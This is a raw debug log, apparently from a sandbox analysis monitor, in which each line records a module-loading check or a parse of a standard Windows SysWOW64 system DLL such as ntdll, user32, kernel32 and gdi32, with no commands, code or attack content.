2020-03-24 10:13:14,979 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:14,979 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:14,979 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:14,979 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:14,979 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:14,979 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:14,993 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:14,993 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:14,993 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:14,993 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:14,993 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:14,993 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:14,993 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:14,993 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:14,993 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:14,993 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:14,993 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:14,993 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:14,993 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:14,993 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:14,993 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:14,993 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:14,993 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:14,993 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:14,993 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:14,993 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:14,993 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:14,993 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:14,993 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:14,993 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:14,993 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:14,993 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:14,993 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\gdi32.dll
2020-03-24 10:13:14,993 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\gdi32.dll
2020-03-24 10:13:14,993 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\lpk.dll
2020-03-24 10:13:14,993 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\lpk.dll
2020-03-24 10:13:14,993 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\usp10.dll
2020-03-24 10:13:14,993 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\usp10.dll
2020-03-24 10:13:14,993 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\msvcrt.dll
2020-03-24 10:13:14,993 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\msvcrt.dll
2020-03-24 10:13:14,993 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\advapi32.dll
2020-03-24 10:13:14,993 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\advapi32.dll
2020-03-24 10:13:15,009 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:15,009 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:15,009 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:15,009 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\KernelBase.dll
2020-03-24 10:13:15,009 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:15,009 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:15,009 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:15,009 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:15,009 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:15,009 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:15,009 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:15,009 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:15,009 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:15,009 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:15,009 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:15,009 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:15,009 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:15,009 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:15,009 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\KernelBase.dll
2020-03-24 10:13:15,009 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:15,009 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:15,009 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:15,009 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:15,009 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:15,009 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:15,009 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:15,009 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:15,009 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:15,009 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:15,009 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:15,009 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:15,009 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:15,009 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\sechost.dll
2020-03-24 10:13:15,009 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\sechost.dll
2020-03-24 10:13:15,009 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\rpcrt4.dll
2020-03-24 10:13:15,009 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\rpcrt4.dll
2020-03-24 10:13:15,009 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\rpcrt4.dll
2020-03-24 10:13:15,026 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\rpcrt4.dll
2020-03-24 10:13:15,026 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\rpcrt4.dll
2020-03-24 10:13:15,026 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\sspicli.dll
2020-03-24 10:13:15,026 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\sspicli.dll
2020-03-24 10:13:15,026 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\cryptbase.dll
2020-03-24 10:13:15,026 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cryptbase.dll
2020-03-24 10:13:15,026 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\ole32.dll
2020-03-24 10:13:15,026 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ole32.dll
2020-03-24 10:13:15,026 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\shlwapi.dll
2020-03-24 10:13:15,026 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shlwapi.dll
2020-03-24 10:13:15,026 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:15,026 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:15,026 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:15,026 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:15,026 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:15,026 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:15,026 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:15,026 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:15,026 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:15,026 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:15,026 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:15,026 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:15,026 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:15,026 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:15,026 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:15,026 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:15,026 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\gdi32.dll
2020-03-24 10:13:15,026 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:15,026 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:15,026 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:15,026 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:15,026 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\gdi32.dll
2020-03-24 10:13:15,026 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\gdi32.dll
2020-03-24 10:13:15,026 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:15,040 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:15,040 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:15,040 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:15,040 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:15,040 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:15,040 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:15,040 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\gdi32.dll
2020-03-24 10:13:15,040 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\gdi32.dll
2020-03-24 10:13:15,040 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:15,040 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:15,040 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:15,040 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:15,040 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:15,040 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:15,040 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:15,040 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:15,040 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:15,040 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:15,040 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:15,040 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:15,040 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:15,040 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:15,040 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:15,040 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:15,040 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:15,040 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:15,040 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:15,040 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:15,040 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\gdi32.dll
2020-03-24 10:13:15,040 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:15,040 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:15,040 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:15,040 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:15,040 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:15,040 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:15,040 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\gdi32.dll
2020-03-24 10:13:15,040 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\gdi32.dll
2020-03-24 10:13:15,040 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\gdi32.dll
2020-03-24 10:13:15,040 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:15,040 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:15,040 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:15,040 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:15,056 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:15,056 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:15,056 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:15,056 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:15,056 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:15,056 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:15,056 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:15,056 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:15,056 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:15,056 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:15,056 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:15,056 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:15,056 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\gdi32.dll
2020-03-24 10:13:15,056 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\gdi32.dll
2020-03-24 10:13:15,056 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:15,056 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:15,056 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:15,056 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:15,056 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:15,056 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:15,056 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:15,056 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:15,056 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:15,056 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:15,056 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:15,056 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:15,056 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:15,056 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:15,056 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:15,056 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:15,056 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:15,056 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:15,056 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:15,056 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:15,056 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\gdi32.dll
2020-03-24 10:13:15,056 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:15,056 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:15,056 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:15,072 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:15,072 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:15,072 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:15,072 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:15,072 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:15,072 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\gdi32.dll
2020-03-24 10:13:15,072 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\gdi32.dll
2020-03-24 10:13:15,072 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
